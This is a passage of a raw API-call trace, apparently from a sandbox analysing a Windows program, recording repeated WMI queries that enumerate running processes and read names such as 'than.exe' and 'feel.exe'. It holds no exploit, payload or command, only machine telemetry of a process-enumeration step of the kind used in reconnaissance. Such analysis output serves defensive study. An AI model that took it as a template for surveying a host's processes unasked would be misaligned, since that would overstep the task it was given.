0x80004002 [0224.879] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8cf68, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8add0) returned 0x0 [0224.880] WbemDefPath:IUnknown:Release (This=0x5e8cf68) returned 0x0 [0224.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8add0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8add0) returned 0x0 [0224.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8add0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.880] WbemDefPath:IUnknown:AddRef (This=0x5e8add0) returned 0x3 [0224.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8add0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8add0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8add0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8cf78) returned 0x0 [0224.880] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8cf78, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.880] WbemDefPath:IUnknown:Release (This=0x5e8cf78) returned 0x3 [0224.880] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.880] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8add0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.880] WbemDefPath:IUnknown:Release (This=0x5e8add0) returned 0x2 [0224.880] WbemDefPath:IUnknown:Release (This=0x5e8add0) returned 0x1 [0224.880] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.880] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.880] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8add0, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8add0) returned 0x0 [0224.881] WbemDefPath:IUnknown:AddRef (This=0x5e8add0) returned 0x3 [0224.881] WbemDefPath:IUnknown:Release (This=0x5e8add0) returned 0x2 [0224.881] WbemDefPath:IWbemPath:SetText (This=0x5e8add0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2956\"") returned 0x0 [0224.881] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.881] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.881] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.881] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.881] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.881] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.881] IWbemClassObject:Get (in: This=0x743098, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26eaa58*=0, plFlavor=0x26eaa5c*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="than.exe", varVal2=0x0), pType=0x26eaa58*=8, plFlavor=0x26eaa5c*=0) returned 0x0 [0224.881] SysStringByteLen (bstr="than.exe") returned 0x10 [0224.881] SysStringByteLen (bstr="than.exe") returned 0x10 [0224.881] IWbemClassObject:Get (in: This=0x743098, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26eaa58*=8, plFlavor=0x26eaa5c*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="than.exe", varVal2=0x0), pType=0x26eaa58*=8, plFlavor=0x26eaa5c*=0) returned 0x0 [0224.881] SysStringByteLen (bstr="than.exe") returned 0x10 [0224.881] SysStringByteLen (bstr="than.exe") returned 0x10 [0224.882] CoTaskMemAlloc (cb=0x4) returned 0x5e8cfa8 [0224.882] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8cfa8, puReturned=0x26dde18 | out: apObjects=0x5e8cfa8*=0x743230, puReturned=0x26dde18*=0x1) returned 0x0 [0224.883] IUnknown:QueryInterface (in: This=0x743230, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x743230) returned 0x0 [0224.883] IUnknown:QueryInterface (in: This=0x743230, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.883] IUnknown:QueryInterface (in: This=0x743230, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.883] IUnknown:AddRef (This=0x743230) returned 0x3 [0224.883] IUnknown:QueryInterface (in: This=0x743230, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.883] IUnknown:QueryInterface (in: This=0x743230, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.883] IUnknown:QueryInterface (in: This=0x743230, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x743234) returned 0x0 [0224.883] IMarshal:GetUnmarshalClass (in: This=0x743234, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.883] IUnknown:Release (This=0x743234) returned 0x3 [0224.883] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.883] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.883] IUnknown:QueryInterface (in: This=0x743230, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.884] IUnknown:Release (This=0x743230) returned 0x2 [0224.884] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.884] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.884] IUnknown:QueryInterface (in: This=0x743230, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x743230) returned 0x0 [0224.884] IUnknown:AddRef (This=0x743230) returned 0x4 [0224.884] IUnknown:Release (This=0x743230) returned 0x3 [0224.884] IUnknown:Release (This=0x743230) returned 0x2 [0224.884] CoTaskMemFree (pv=0x5e8cfa8) [0224.884] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.884] IUnknown:AddRef (This=0x743230) returned 0x3 [0224.884] IWbemClassObject:Get (in: This=0x743230, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.884] IWbemClassObject:Get (in: This=0x743230, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2964\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.884] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2964\"") returned 0x66 [0224.885] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2964\"") returned 0x66 [0224.885] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.885] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.885] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.885] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.885] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8cfa8) returned 0x0 [0224.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8cfa8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.886] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8cfa8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8038) returned 0x0 [0224.886] WbemDefPath:IUnknown:Release (This=0x5e8cfa8) returned 0x0 [0224.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8038, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8038) returned 0x0 [0224.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8038, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.886] WbemDefPath:IUnknown:AddRef (This=0x5eb8038) returned 0x3 [0224.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8038, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8038, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.886] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8038, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8cfb8) returned 0x0 [0224.887] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8cfb8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.887] WbemDefPath:IUnknown:Release (This=0x5e8cfb8) returned 0x3 [0224.887] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.887] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8038, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.887] WbemDefPath:IUnknown:Release (This=0x5eb8038) returned 0x2 [0224.887] WbemDefPath:IUnknown:Release (This=0x5eb8038) returned 0x1 [0224.887] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.887] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8038, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8038) returned 0x0 [0224.887] WbemDefPath:IUnknown:AddRef (This=0x5eb8038) returned 0x3 [0224.887] WbemDefPath:IUnknown:Release (This=0x5eb8038) returned 0x2 [0224.887] WbemDefPath:IWbemPath:SetText (This=0x5eb8038, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2964\"") returned 0x0 [0224.887] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.887] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.887] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.887] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.887] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.887] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.887] IWbemClassObject:Get (in: This=0x743230, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26eb2bc*=0, plFlavor=0x26eb2c0*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="feel.exe", varVal2=0x0), pType=0x26eb2bc*=8, plFlavor=0x26eb2c0*=0) returned 0x0 [0224.887] SysStringByteLen (bstr="feel.exe") returned 0x10 [0224.887] SysStringByteLen (bstr="feel.exe") returned 0x10 [0224.888] IWbemClassObject:Get (in: This=0x743230, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26eb2bc*=8, plFlavor=0x26eb2c0*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="feel.exe", varVal2=0x0), pType=0x26eb2bc*=8, plFlavor=0x26eb2c0*=0) returned 0x0 [0224.888] SysStringByteLen (bstr="feel.exe") returned 0x10 [0224.888] SysStringByteLen (bstr="feel.exe") returned 0x10 [0224.888] CoTaskMemAlloc (cb=0x4) returned 0x5e8cfe8 [0224.888] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8cfe8, puReturned=0x26dde18 | out: apObjects=0x5e8cfe8*=0x7433c8, puReturned=0x26dde18*=0x1) returned 0x0 [0224.889] IUnknown:QueryInterface (in: This=0x7433c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x7433c8) returned 0x0 [0224.890] IUnknown:QueryInterface (in: This=0x7433c8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.890] IUnknown:QueryInterface (in: This=0x7433c8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.890] IUnknown:AddRef (This=0x7433c8) returned 0x3 [0224.890] IUnknown:QueryInterface (in: This=0x7433c8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.890] IUnknown:QueryInterface (in: This=0x7433c8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.890] IUnknown:QueryInterface (in: This=0x7433c8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x7433cc) returned 0x0 [0224.890] IMarshal:GetUnmarshalClass (in: This=0x7433cc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.890] IUnknown:Release (This=0x7433cc) returned 0x3 [0224.890] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.890] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.890] IUnknown:QueryInterface (in: This=0x7433c8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.890] IUnknown:Release (This=0x7433c8) returned 0x2 [0224.890] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.890] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.890] IUnknown:QueryInterface (in: This=0x7433c8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x7433c8) returned 0x0 [0224.891] IUnknown:AddRef (This=0x7433c8) returned 0x4 [0224.891] IUnknown:Release (This=0x7433c8) returned 0x3 [0224.891] IUnknown:Release (This=0x7433c8) returned 0x2 [0224.891] CoTaskMemFree (pv=0x5e8cfe8) [0224.891] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.891] IUnknown:AddRef (This=0x7433c8) returned 0x3 [0224.891] IWbemClassObject:Get (in: This=0x7433c8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.891] IWbemClassObject:Get (in: This=0x7433c8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2972\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.891] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2972\"") returned 0x66 [0224.891] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2972\"") returned 0x66 [0224.891] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.892] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.892] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, 